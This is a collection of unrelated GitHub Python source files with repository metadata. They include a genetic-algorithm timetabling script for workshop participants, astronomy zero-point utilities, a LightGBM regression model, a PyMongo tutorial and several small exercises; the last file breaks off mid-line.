their associated organization\"\"\"\n\torganization = kwargs.get('org')\n\n\torganization_id = Organizations.get_query(info).filter(\n\t\tOrganizationsModel.organization == organization\n\t).options(load_only('id'))\n\n\tif not len(organization_id.all()):\n\t\traise GraphQLError(\"Error, no organization associated with that enum\")\n\n\tquery = Domains.get_query(info).filter(\n\t\tDomainModel.organization_id == organization_id\n\t)\n\n\tif not len(query.all()):\n\t\traise GraphQLError(\"Error, no domains associated with that organization\")\n\treturn query.all()\n","repo_name":"naeemhaq/tracker","sub_path":"api/resolvers/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"28557193720","text":"\n# Q3: Select a number. Ask the user to enter a number, output whether their number is less than or greater than\n# the selected number. Repeat this process until the user guesses the correct number.\n\n#Let i be any number used as a number for user to guess\ni = 25 \nnum=int(input(\"Guess a number: \"))\n\n#Use while loop to repeat code until a user guess the right number\nwhile num!=i:\n if num<i:\n print(\"Too low\")\n # num=int(input(\"Guess a number: \")) #added to break the while loop and to ask the user to guess the number again\n elif num>i:\n print(\"Too high\")\n num=int(input(\"Guess a number: \")) #Tab out from if statement to break the loop\nelse: num=i #Best practice to add the else \nprint(\"Correct\")\n\n","repo_name":"SheCodesAus/she-codes-python-exercises-mvmirhan","sub_path":"0_exercises/whileloops_q3.py","file_name":"whileloops_q3.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26968157017","text":"# first you have to setup MongoDB, mine in in \"C:\\mongodb\".\n# Create data file in \"C:\\data\\db\" using command \"mkdir C:\\data\\db\" in command promt.\n# Start server using command \"mongod\" in command prompt.\n\n\"\"\"..........Making a Connection with MongoClient..........\"\"\"\nfrom pymongo import MongoClient\nclient = MongoClient()\n# The above code will connect on the default host and port. We can also specify the host and port explicitly,\n# as follows:\n# client = MongoClient('localhost', 27017)\n# client = MongoClient('mongodb://localhost:27017/')\n\n\"\"\"..........Getting a Database..........\"\"\"\n# A single instance of MongoDB can support multiple independent databases. When working with PyMongo you access\n# databases using attribute style access on MongoClient instances:\ndb = client.test_database\n# If your database name is such that using attribute style access won’t work (like test-database),\n# you can use dictionary style access instead:\n# db = client['test-database']\n\n\"\"\"..........Getting a Collection..........\"\"\"\n# A collection is a group of documents stored in MongoDB, and can be thought of as roughly the equivalent of a table in\n# a relational database. Getting a collection in PyMongo works the same as getting a database:\ncollection = db.test_collection\n# or (using dictionary style access):\n# collection = db['test-collection']\n# An important note about collections (and databases) in MongoDB is that they are created lazily - none of the above\n# commands have actually performed any operations on the MongoDB server. Collections and databases are created when the\n# first document is inserted into them.\n\n\"\"\"..........Documents..........\"\"\"\n# Data in MongoDB is represented (and stored) using JSON-style documents. In PyMongo we use dictionaries to represent\n# documents. As an example, the following dictionary might be used to represent a blog post:\nimport datetime\npost = {\n \"author\": \"Sajid\",\n \"text\": \"My first practice with MongoDB and Python\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": datetime.datetime.utcnow()\n}\n# Note that documents can contain native Python types (like datetime.datetime instances) which will be automatically\n# converted to and from the appropriate BSON types.\n\n\"\"\"..........Inserting a Document..........\"\"\"\n# To insert a document into a collection we can use the insert_one() method:\nposts = db.posts\npost_id = posts.insert_one(post).inserted_id\nprint(post_id)\n# When a document is inserted a special key, \"_id\", is automatically added if the document doesn’t already contain an\n# \"_id\" key. The value of \"_id\" must be unique across the collection. insert_one() returns an instance of\n# InsertOneResult. For more information on \"_id\", see the documentation on _id.\n# After inserting the first document, the posts collection has actually been created on the server. We can verify this\n# by listing all of the collections in our database:\nprint(db.collection_names(include_system_collections=False))\n\n\"\"\"..........Getting a Single Document With find_one()..........\"\"\"\n# The most basic type of query that can be performed in MongoDB is find_one(). This method returns a single document\n# matching a query (or None if there are no matches). It is useful when you know there is only one matching document,\n# or are only interested in the first match. Here we use find_one() to get the first document from the posts collection:\nprint(posts.find_one())\n# The result is a dictionary matching the one that we inserted previously.\n# Note: The returned document contains an \"_id\", which was automatically added on insert.\n# find_one() also supports querying on specific elements that the resulting document must match. To limit our results\n# to a document with author “Sajid” we do:\nprint(posts.find_one({\"author\": \"Sajid\"}))\n# If we try with a different author, like “Eliot”, we’ll get no result:\nprint(posts.find_one({\"author\": \"Eliot\"}))\n","repo_name":"ahmadalsajid/MongoDBPractice","sub_path":"FirstMongo.py","file_name":"FirstMongo.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36541691985","text":"import pygame as pg\nimport random\n\nMAROON = [128, 0, 0]\nBLACK = [0] * 3\nRED = [255, 0, 0]\nW, H = 500, 500\n\npg.init()\nwin = pg. display.set_mode((W, H))\n\nwhile 1:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n pg.quit()\n exit()\n\n for i in range(10):\n pg.draw.circle(win, MAROON,\n (random.randint(0, W), random.randint(0, H)), 1)\n\n pressed = pg.mouse.get_pressed()\n if pressed[0]:\n pos = pg.mouse.get_pos()\n pg.draw.circle(win, RED, pos, 5)\n pg.display.update()\n\n pg.time.delay(20)","repo_name":"bulatgilfanov/pyton_study","sub_path":"les.21.py","file_name":"les.21.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39493846023","text":"from django.urls import path\nfrom watchlist_app.api import views\n\nurlpatterns = [\n # path('list/',views.movie_list ,name = 'movie-list'),\n # path('<int:pk>',views.movie_details ,name = 'movie-details'),\n \n # path('list/',views.MovieListAV.as_view() ,name = 'movie-list'),\n # path('<int:pk>',views.MovieDetailAV.as_view() ,name = 'movie-details'),\n path('list/',views.WatchListAV.as_view() ,name = 'movie-list'),\n path('<int:pk>',views.WatchDetailAV.as_view() ,name = 'movie-details'),\n path('stream/',views.StreamPlatformAV.as_view(), name ='stream'),\n path('stream/<int:pk>',views.StreamPlatformDetailAV.as_view(), name = 'Stream-details')\n]","repo_name":"aayush162001/watchmate","sub_path":"watchlist_app/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27440905680","text":"import sys\nimport argparse\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy import units\n\n\ndef get_zeropoint_info(filename, ext=0):\n \"\"\"\n Compute zero-point information from a fits image.\n\n For more information about zeropoints take a look at the following links:\n https://www.stsci.edu/hst/wfpc2/Wfpc2_dhb/wfpc2_ch52.html\n https://www.stsci.edu/hst/instrumentation/acs/data-analysis/zeropoints\n\n Parameters\n ----------\n filename : str\n The path of the fits file image.\n\n ext : int, optional\n The FITS extension containing the image data. The default value is 0.\n\n Returns\n -------\n zpt_dict : ditct\n A dicttionary containing the zero-point information.\n The dictionary contains the following items:\n\n - exp_time : float\n The exposure time\n\n - phot_f_lam : float\n The value of PHOTFLAM. This is the flux of a source with\n constant flux per unit wavelength (in erg s-1 cm-2 A-1) which\n produces a count rate of 1 count per second.\n\n - phot_p_lam : float\n the pivot wavelength (in Angstrom)\n\n - zero_point : sloat\n the zero point value\n\n - zero_point_p : float\n the zero point value plus 2.5 times log10 of the exposure time\n\n - zero_point_m : float\n the zero point value minus 2.5 times log10 of the exposure time\n\n - counts_to_flux : float\n Quantity to convert counts to flux units\n \"\"\"\n hdr = fits.getheader(filename, ext=ext)\n phot_f_lam = hdr['PHOTFLAM']\n phot_p_lam = hdr['PHOTPLAM']\n exp_time = hdr['EXPTIME']\n\n try:\n science_units = hdr['BUNIT']\n except KeyError:\n science_units = None\n\n zpt = -2.5 * np.log10(phot_f_lam) - 21.10\n zpt += -5 * np.log10(phot_p_lam) + 18.6921\n\n acs_zpt_pexp = zpt + 2.5 * np.log10(exp_time)\n acs_zpt_mexp = zpt - 2.5 * np.log10(exp_time)\n\n if science_units is not None and science_units.lower().endswith('/s'):\n counts_to_flux = phot_f_lam\n else:\n counts_to_flux = phot_f_lam/exp_time\n\n zpt_dict = {\n \"exp_time\": exp_time,\n \"phot_f_lam\": phot_f_lam,\n \"phot_p_lam\": (phot_p_lam / 10) * units.nm,\n \"zero_point\": zpt,\n \"zero_point_p\": acs_zpt_pexp,\n \"zero_point_m\": acs_zpt_mexp,\n 'counts_to_flux': counts_to_flux\n }\n return zpt_dict\n\n\ndef print_zeropoint_info(filename, ext=0):\n \"\"\"\n Print the zero-points information of a FITS image.\n\n Parameters\n ----------\n filename : str\n The path of a FITS file image.\n ext : int, optional\n The FITS extension containing the image data. The default value is 0.\n\n Returns\n -------\n None.\n\n \"\"\"\n zpt_dict = get_zeropoint_info(filename)\n print(f\"\\n{filename}\")\n s = \"Exp time: {exp_time}\\n\"\n s += \"Pivot wavelenght: {phot_p_lam:.0f}\\n\"\n s += \"Zero point: {zero_point}\\n\"\n s += \"Zero point (+m): {zero_point_p}\\n\"\n s += \"Zero point (-m): {zero_point_m}\\n\"\n print(s.format(**zpt_dict))\n\n\ndef main(options=None):\n \"\"\"\n Run the main program of this module.\n\n Returns\n -------\n None.\n\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Print zero-point ifnormatio of FITS images.'\n )\n parser.add_argument(\n 'inp_files', metavar='FITS_IMAGES', type=str, nargs='+',\n help='One or more than one fits file for which you want to view the'\n 'zero-point information'\n )\n parser.add_argument(\n '--ext', metavar='EXT', type=int, default=0,\n help='The extension containing the image data.'\n )\n\n if options is None:\n args = parser.parse_args()\n else:\n args = parser.parse_args(options)\n\n for fname in args.inp_files:\n try:\n print_zeropoint_info(fname)\n except Exception:\n print(\n f\"ERROR: Cannot read zeropoint info for file {fname}\",\n file=sys.stderr\n )\n continue\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mauritiusdadd/python-specex","sub_path":"src/specex/zeropoints.py","file_name":"zeropoints.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10955017417","text":"from typing import List\n\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n\n # not legal\n if len(mat) * len(mat[0]) != r * c:\n return mat\n\n asList = []\n for row in mat:\n asList.extend(row)\n print(asList)\n \n result = []\n\n for rowIdx in range(r):\n\n newRow = asList[rowIdx*c: (rowIdx*c)+c]\n print(newRow)\n result.append(newRow)\n \n return result\n\n\n\n ","repo_name":"A7fa7fa/python-leetcode","sub_path":"0566 - reshape-the-matrix/reshape-the-matrix.py","file_name":"reshape-the-matrix.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11602059250","text":"#!/usr/bin/python\nimport sys\nimport os\nimport math\nimport csv\nimport random\nimport statistics\nimport copy\nimport logging\n\nlog = logging.getLogger(__name__)\n\n# add script folder to path for imports\nfull_path = os.path.abspath(os.path.dirname(sys.argv[0]))\nsys.path.append(full_path)\n\n\nclass GeneticAlg:\n def __init__(self, par, act, ndays):\n self.par = par\n self.act = act\n self.NDAYS = ndays\n\n\ndef randy_marsh():\n return int.from_bytes(os.urandom(4), byteorder=\"big\")\n\n# SET NUMBER OF DAYS\nactivity_max = 0\ngrouped = {}\nchr_id = 0\nDEBUG1 = True\nglobal g_w1\nglobal g_w2\n\nclass Ga_oratorio:\n def __init__(self, data=\"../data/delavnice.csv\", pop_size=20, n_phases=10,\n crossover_chance=0.7, mutation_chance=0.7):\n\n global participants\n global activities\n global grouped\n global activity_max\n\n print(\"Initializiing ga_oratorio with population size: %d.\" % (pop_size))\n\n self.pop_size = pop_size\n self.n_phases = n_phases\n self.crossover_chance = crossover_chance\n self.mutation_chance = mutation_chance\n\n self.day_plan = [] # build at the end\n\n self.best_chromosome = None\n\n participants, activities = data_reader.read_data17(data)\n\n activity_max = math.floor ( len(participants) / len(activities) * n_days )\n\n self.group_participants([\"Neža Klemenčič\", \"Eva Klemenčič\", \"Zala Bertoncelj\"]) #fine tuning (some participants want to be together)\n self.group_participants([\"Jan Potočnik\", \"Urban Porenta\"])\n self.group_participants([\"Neja Potočnik\", \"Iza Šink\", \"Nika Krmelj\"])\n self.group_participants([\"Anja Hadalin \", \"Karmen Logonder\"])\n \"\"\"\n for key in grouped:\n for par in participants:\n if par[\"id\"] == key:\n print (par)\n print (\"{}{}\".format(key, grouped[key]))\n \"\"\"\n\n #print (self.activities)\n #print (self.participants)\n\n self.population = []\n self.init_population()\n\n # group_participants and return_groups take care of participants that wish to be together (they handle them as one)\n def group_participants(self, names):\n global participants\n global grouped\n\n #!! this means the participants will go to same\n #!! activities as the first one in names\n pp = []\n for name in names:\n for i,par in enumerate(participants):\n if par[\"name\"] == name:\n pp += [par]\n participants.remove(par)\n #check for same activities\n grades = [ x[\"grade\"] for x in pp ]\n grp = {\n \"id\": pp[0][\"id\"],\n \"name\": \"grp_{}\".format(pp[0][\"id\"]),\n \"grade\": sum(grades)/len(grades),\n \"count\": len(pp),\n \"pref\": pp[0][\"pref\"],\n \"activities\": pp[0][\"activities\"]\n }\n grouped[pp[0][\"id\"]] = pp\n participants += [grp]\n\n def return_groups(self, chromo):\n global grouped\n for key in grouped:\n for par in chromo.chromosome:\n if par[\"id\"] == key:\n #replace group with participants, keep activities\n for p in grouped[key]:\n p[\"activities\"] = par[\"activities\"]\n chromo.chromosome.remove(par)\n chromo.chromosome += grouped[key]\n break\n return chromo\n\n for participant in chromo.chromosome:\n if participant[\"id\"] in grouped:\n saved_id = participant[\"id\"]\n #put activities into participans, saved in goruped\n for saved_p in grouped[saved_id]:\n saved_p[\"activities\"] = participant[\"activities\"]\n chromo.chromosome.remove(participant)\n chromo.chromosome += grouped[saved_id]\n del grouped[saved_id]\n #print ( [\"--{}\".format(p[\"name\"]) for p in chromo.chromosome ] )\n return chromo\n\n def init_population(self):\n print(\"Initializing population:\")\n for i in range(self.pop_size):\n chrm = Chromosome(participants=participants)\n self.population += [chrm]\n\n def calc_pop_fitnesses(self):\n all_fit = []\n all_sum = 0\n for chromosome in self.population:\n f = chromosome.fitness\n all_fit += [f]\n all_sum += f\n if self.best_chromosome is None:\n self.best_chromosome = chromosome\n elif f < self.best_chromosome.fitness:\n self.best_chromosome = copy.deepcopy(chromosome)\n avg = all_sum/len(all_fit)\n \"\"\"\n for f in sorted(all_fit):\n print (f)\n print (\"------\")\n \"\"\"\n return (all_fit, avg)\n\n def evolve(self):\n phase = 0\n print(\"Begin evolving.\")\n pop_fit,avg_fit = self.calc_pop_fitnesses()\n while phase < self.n_phases:\n\n #testing:\n #pop_fit = [ 26,73,3,78,43,13 ] \n\n #sorted indices from best fitness (lowest variance) to worst fitness\n sorted_fit = [ y[0] for y in sorted(enumerate(pop_fit), key=lambda x:x[1]) ]\n #print (pop_fit)\n #print (sorted_fit)\n\n # pick chromosomes for crossover\n cross_sel = self.roulette_select(pop_fit, self.crossover_chance)\n #print (cross_sel)\n\n #perform crossover\n new_population = []\n n_added = 0\n for i in cross_sel:\n # randomly pick another one from cross_sel and cross\n j = cross_sel[randy_marsh() % len(cross_sel)]\n if i == j:\n continue #don't crossover same chromosome\n \n new_2_chromosomes = self.population[i].crossover( self.population[j] )\n if new_2_chromosomes[0].fitness < self.population[i].fitness and new_2_chromosomes[0].fitness < self.population[j].fitness:\n new_population += [new_2_chromosomes[0]]\n n_added += 1\n if new_2_chromosomes[1].fitness < self.population[i].fitness and new_2_chromosomes[1].fitness < self.population[j].fitness:\n new_population += [new_2_chromosomes[1]]\n n_added += 1\n\n #print (\"len_pop: %d, n_added: %d\" % ( len(self.population), n_added) )\n #remove some bad chromosomes\n if n_added > 0:\n new_population += [ self.population[x] for x in sorted_fit[:-n_added] ]\n self.population = new_population\n\n #mutate random chromosomes (leave best intact)\n pl = len(self.population)\n for i in range(math.ceil(pl*self.mutation_chance)):\n #pick random and mutate\n ridx = randy_marsh()%pl\n if self.population[ridx].id is not self.best_chromosome.id:\n self.population[ridx].mutate\n\n pop_fit,avg_fit = self.calc_pop_fitnesses()\n print(\"End of phase: %4d\\t|\\tbest_chromosome: %d (%3.3f)\\t|\\tavg fitness: %3.3f\" % \n (phase, self.best_chromosome.id, self.best_chromosome.fitness, avg_fit))\n phase += 1\n print(\"Evolution concluded.\")\n\n def build_day_plan(self):\n self.day_plan = []\n for i in range(n_days):\n self.day_plan += [[]]\n for j,a in enumerate(activities):\n self.day_plan[i] += [[]]\n\n bc = self.best_chromosome\n bc = self.return_groups( bc )\n for person in bc.chromosome:\n for i,act in enumerate(person[\"activities\"]):\n self.day_plan[i][act] += [ \"{}-{}\".format(person[\"grade\"],\n person[\"name\"]) ]\n\n def export_data(self, outfilepath):\n with open(outfilepath, 'w') as csvfile:\n spamwriter = csv.writer(\n csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n header = []\n for d in range (n_days):\n header += [ \"Dan {}: {}\".format(d, x[\"name\"]) for x in activities ]\n spamwriter.writerow(header)\n\n stop = False\n row = 0\n while not stop:\n out_row = []\n stop = True\n for day in self.day_plan:\n for act in day:\n if row < len(act):\n stop = False\n out_row += [act[row]]\n else:\n out_row += [\"/\"]\n spamwriter.writerow(out_row)\n row += 1\n print(\"Finished writing to file: %s\" % outfilepath)\n\n def roulette_select(self, ftns, pcnt):\n # input: chromosome fitnesses, output: indices of surviving chromosomes\n # fitness closer to 0: better\n # fitness is POSITIVE, you want to minimize it\n s = max(ftns)\n # subtract every value from s to invert importance\n ftns[:] = [pow(1 - x / s, 2) for x in ftns] #pow to increase difference\n # print(ftns)\n\n # create roulette_wheel\n ss = 0\n wheel = []\n for n in ftns:\n ss = ss + n\n wheel += [ss]\n # print(wheel)\n\n sel_ids = []\n # pcnt == percentage of survivers\n surv = math.ceil(len(ftns) * pcnt)\n #print (\"from %d, pick %f survivers: %d\" % (len(ftns), pcnt, surv))\n # return i survivers\n for i in range(0, surv):\n # random\n r = (randy_marsh() % 100) / 100 * wheel[-1]\n # pick a chromosome\n idx = 0\n for j in range(0, len(wheel)):\n idx = j\n if r < wheel[j]:\n break\n sel_ids += [idx]\n # print(sel_ids)\n return sel_ids\n\n\nclass Chromosome:\n def __init__(self, participants=None, chromosome=None):\n global chr_id\n self.id = chr_id\n chr_id += 1\n if chromosome is not None:\n self.chromosome = copy.deepcopy(chromosome)\n elif participants is not None:\n self.chromosome = self.init_chromosome(participants)\n else:\n raise Exception(\"Need more data to initalize a chromosome.\")\n\n self.fitness = 9999999\n self.update_fitness()\n\n def short_print(self):\n print (\"[%4d] (%3.3f)\" % (self.id, self.fitness) )\n if not self.chromosome:\n l = \"Empty\"\n else:\n l = [ p[\"id\"] for p in self.chromosome ]\n print (l)\n\n def init_chromosome(self, participants):\n global activities\n # reset counter\n for a in activities:\n a[\"count\"] = 0\n\n # creates a random chromosome\n chromosome = []\n for i, participant in enumerate(participants):\n p1 = copy.deepcopy(participant)\n\n # in p1[\"pref\"], we have activity ids [1,2,...] sorted by preference\n # since our representation starts with [0,1,...], we need to -1 every id\n acts = []\n day = 0\n for act in p1[\"pref\"]:\n act_id = act-1\n if day == n_days:\n break\n if activities[act_id][\"count\"] >= activity_max:\n continue\n activities[act_id][\"count\"] += 1\n acts += [act_id]\n day += 1\n p1[\"activities\"] = copy.deepcopy(acts)\n\n random.shuffle(p1[\"activities\"])\n chromosome += [p1]\n\n #print (chromosome)\n return chromosome\n\n def update_fitness (self, gsv_weight=1, aigv_weight=1):\n gsv_weight = g_w1\n aigv_weight = g_w2\n\n # build groups\n groups = []\n for day in range(n_days):\n groups += [[]]\n for activity in range(len(activities)):\n groups[day] += [[]]\n for person in self.chromosome:\n for day, act in enumerate(person[\"activities\"]):\n groups[day][act] += [person]\n\n # group size variance\n grp_sizes = []\n for day in groups:\n for act in day:\n grp_sizes += [sum([person[\"count\"] for person in act])]\n gsv = statistics.variance(grp_sizes)\n\n # average intragroup grade(age) variance\n aigv = 0\n count = 0\n for day in groups:\n for act in day:\n if len(act) < 2:\n continue\n aigv += statistics.variance([ person[\"grade\"] for person in act ])\n count += 1\n aigv = aigv / count\n\n # print(gsv)\n # print(aigv)\n f = gsv * gsv_weight + aigv * aigv_weight\n self.fitness = f\n return f\n\n def mutate(self):\n #print (\"Mutating %d.\" % self.id)\n # select random child, swap two items in his activities\n r = randy_marsh() % len(self.chromosome)\n random.shuffle(self.chromosome[r][\"activities\"])\n self.update_fitness()\n\n def crossover(self, chromosome2, prnt=False):\n r = randy_marsh() % len(self.chromosome)\n ret1 = self.chromosome[:r] + chromosome2.chromosome[r:]\n chr1 = Chromosome (chromosome=ret1)\n ret2 = chromosome2.chromosome[:r] + self.chromosome[r:]\n chr2 = Chromosome (chromosome=ret2)\n if prnt and self.id == chromosome2.id:\n print (\"Crossover::Self.fitness: %f, c2.fitness: %f, r1.fitness: %f, r2.fitness: %f.\" % (self.fitness, chromosome2.fitness, chr1.fitness, chr2.fitness))\n return (chr1, chr2)\n\nif __name__ == \"__main__\":\n # Inside class __init__ set groups of participants that want to be together\n # Set global variable n_days\n\n g_w1 = 1\n g_w2 = 0 \n for rep in range(1): \n n_days = 4\n activities = None\n participants = None\n grouped = {}\n chr_id = 0\n DEBUG1 = True\n\n ga = Ga_oratorio(data=\"../data/delavnice_2017.csv\", pop_size=50, n_phases=300, crossover_chance=0.7, mutation_chance=0.3)\n\n ga.evolve()\n ga.build_day_plan()\n\n for x in ga.best_chromosome.chromosome:\n print (\"{:20s}: {}\".format(x[\"name\"], x[\"activities\"]))\n\n for d,day in enumerate(ga.day_plan):\n for a,act in enumerate(day):\n print (\"Day {} - {}:\\n{}\".format(d,activities[a][\"name\"],act))\n\n ga.export_data(\"../data/out_{}.csv\".format(rep))\n\n g_w1 -= 0.1\n g_w2 += 0.1\n \n\n\n\n\n\n\n\n\n\n","repo_name":"voje/ga_timetable","sub_path":"python/timetablenator/GeneticAlg.py","file_name":"GeneticAlg.py","file_ext":"py","file_size_in_byte":14562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7743875470","text":"#!/usr/bin/env python3\nimport random\nimport requests\n\nCOLLECTION_URL = \"https://www.roysac.com/asciinudes/NudeArray.txt\"\nNUDE_URL_FMT = \"https://www.roysac.com/asciinudes/{}\"\n\nif __name__ == \"__main__\":\n r = requests.get(COLLECTION_URL)\n lines = [l.strip() for l in r.text.split('\\n')]\n line = random.choice(lines[1:])\n name = line.split('|')[5]\n r = requests.get(NUDE_URL_FMT.format(name))\n print(r.text.strip())\n","repo_name":"tim-napoli/showmepron","sub_path":"showmepron.py","file_name":"showmepron.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27205724273","text":"# -*- coding: utf-8 -*-\n\"\"\" Tests for the authentification utilities.\"\"\"\nfrom pyramid import testing\n\nfrom anuket.tests import AnuketTestCase\nfrom anuket.tests import AnuketDummyRequest\n\n\nclass DummyAuthenticationPolicy:\n \"\"\" Dummy a uthentication policy class for testing Anuket\n authentification.\n \"\"\"\n def __init__(self, result):\n self.result = result\n\n def unauthenticated_userid(self, request):\n \"\"\" Fake the `pyramid.security.unauthenticated_userid` method.\"\"\"\n return self.result\n\n\nclass SecurityTests(AnuketTestCase):\n \"\"\" Test the authentification utilities.\"\"\"\n def test_groupfinder(self):\n \"\"\" Test the `groupfinder` callback.\"\"\"\n user = self.dummy_user_fixture()\n from anuket.security import groupfinder\n request = testing.DummyRequest()\n # test with a valid user_id\n groupname = groupfinder(1, request)\n self.assertEqual(groupname, [('group:%s' % user.group.groupname)])\n # test with a wrong username\n groupname = groupfinder(u'wrongname', request)\n self.assertEqual(groupname, None)\n # test with an empty username\n groupname = groupfinder(None, request)\n self.assertEqual(groupname, None)\n\n def test_get_auth_user(self):\n \"\"\" Test the `get_auth_user` function.\"\"\"\n user = self.dummy_user_fixture()\n from anuket.security import get_auth_user\n request = AnuketDummyRequest()\n\n from pyramid.interfaces import IAuthenticationPolicy\n policy = DummyAuthenticationPolicy(user.user_id)\n request.registry.registerUtility(policy, IAuthenticationPolicy)\n\n auth_user = get_auth_user(request)\n self.assertEqual(auth_user, user)\n","repo_name":"lazaret/anuket","sub_path":"anuket/tests/test_security.py","file_name":"test_security.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"71640234292","text":"import lightgbm as lgb\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import KFold\nfrom feature_engineering import get_features\n\n\ndef cv_LGBM(X, y):\n # cross-validation\n params = {'num_leaves': 50,\n 'min_child_samples': 79,\n 'min_data_in_leaf': 100,\n 'objective': 'regression',\n 'max_depth': 9,\n 'learning_rate': 0.2,\n \"boosting_type\": \"gbdt\",\n \"subsample_freq\": 1,\n \"subsample\": 0.9,\n \"metric\": 'mae',\n \"verbosity\": -1,\n 'reg_alpha': 0.1,\n 'reg_lambda': 0.3,\n 'colsample_bytree': 1.0,\n }\n\n reg_model = lgb.LGBMRegressor(**params)\n scores = []\n cv = KFold(n_splits=10, random_state=42)\n\n for train_index, test_index in cv.split(X):\n print(\"Train Index: \", train_index)\n print(\"Test Index: \", test_index, \"\\n\")\n\n X_train, X_test, y_train, y_test = X.iloc[train_index], X.iloc[test_index], y[train_index], y[test_index]\n reg_model.fit(X_train, y_train)\n scores.append(reg_model.score(X_test, y_test))\n\n print('Avg. score: \\n {}'.format(np.mean(scores)))\n\n ####################################################################################################################\n # Validation\n\n y_predict = reg_model.predict(X_test)\n print('Train score: {}'.format(reg_model.score(X_train, y_train)))\n print('Test score: {}'.format(reg_model.score(X_test, y_test)))\n\n fig, axes = plt.subplots()\n fig.set_size_inches(16, 12)\n lgb.plot_importance(reg_model, ax=axes)\n plt.show()\n\n # print MAE\n error = mean_absolute_error(y_test, y_predict)\n print('The mean absolute deviation is {}'.format(np.log(error)))\n\n return reg_model\n\ndef prediction(reg_model, test):\n\n y_predict_lgb = reg_model.predict(test)\n submit = pd.read_csv(os.path.join(filepath, 'sample_submission.csv')).drop(columns='scalar_coupling_constant')\n submit['scalar_coupling_constant'] = y_predict_lgb\n submit.to_csv(os.path.join(dir_out, 'submission.csv'), index=False)\n\n\nif __name__ == \"__main__\":\n\n if 'ygong' in os.getcwd():\n filepath = \"../data\"\n dir_out = \"../output\"\n else:\n filepath = \"/home/gong/Documents/Kaggle_July2019/data\"\n dir_out = \"/home/gong/Documents/Kaggle_July2019/output\"\n\n train, test = get_features(filepath)\n\n # drop irrelevant columns\n drop_list = ['id', 'molecule_name', 'atom_0', 'atom_1', 'type']\n X = train.drop(columns=['scalar_coupling_constant'] + drop_list)\n y = train['scalar_coupling_constant']\n test = test.drop(columns=drop_list)\n\n # cross-validation\n model = cv_LGBM(X, y)\n # prediction on test dataset\n prediction(model, test)\n\n","repo_name":"geraldgong/Kaggle_July2019","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25915621880","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\nimport functools\n\n# Decorator to wrap a dialog\ndef InitDialogWithOkCancel(fun = None, Layout = QtWidgets.QFormLayout , apply_ = True):\n def wrap_init(init_fun):\n @functools.wraps(init_fun)\n def wrapped_init(self, parent, *args, **kwargs):\n super(QtWidgets.QDialog, self).__init__(parent)\n self.setModal(True)\n self.layout = Layout(self)\n init_fun(self, parent, *args, **kwargs)\n confirmLayout = QtWidgets.QHBoxLayout()\n okButton = QtWidgets.QPushButton(\"Ok\", self)\n confirmLayout.addWidget(okButton)\n okButton.clicked.connect(self.accept)\n if apply_:\n applyButton = QtWidgets.QPushButton(\"Apply\", self)\n confirmLayout.addWidget(applyButton)\n applyButton.clicked.connect(self.apply)\n cancelButton = QtWidgets.QPushButton(\"Cancel\", self)\n confirmLayout.addWidget(cancelButton)\n cancelButton.clicked.connect(self.reject)\n if Layout is QtWidgets.QFormLayout:\n self.layout.addRow(confirmLayout)\n elif Layout is QtWidgets.QGridLayout:\n colSpan = 2\n if apply_:\n colSpan += 1\n self.layout.addLayout(confirmLayout, self.layout.rowCount(), 1, 1, colSpan)\n else:\n self.layout.addLayout(confirmLayout)\n return wrapped_init\n if fun:\n return wrap_init(fun)\n else:\n return wrap_init\n","repo_name":"stephane-caron/lipm_walking_controller","sub_path":"logs/mc_log_ui/mc_log_utils.py","file_name":"mc_log_utils.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":187,"dataset":"github-code","pt":"21"} +{"seq_id":"36145282832","text":"#!/bin/env python\n\nimport argparse\nimport os\nfrom os import path\n\nparser = argparse.ArgumentParser()\nparser.add_argument(dest=\"tumour_base_name\")\nparser.add_argument(dest=\"normal_base_name\")\n\nargs = parser.parse_args()\ntumour_base = args.tumour_base_name\nnorm_base = args.normal_base_name\n\ntumour_bam = \"%s.sorted.bam\" % tumour_base\ntumour_index = tumour_bam + \".bai\"\n\nif os.path.exists(tumour_bam) and os.path.exists(tumour_index):\n base_dir = os.path.dirname(tumour_bam)\n unsorted_bam = \"%s.bam\" % tumour_base\n if os.path.exists(unsorted_bam):\n os.remove(unsorted_bam)\n print(\"Removed %s\" % unsorted_bam) \n files = os.listdir(base_dir)\n for file in files:\n if file.endswith(\".sam\") or 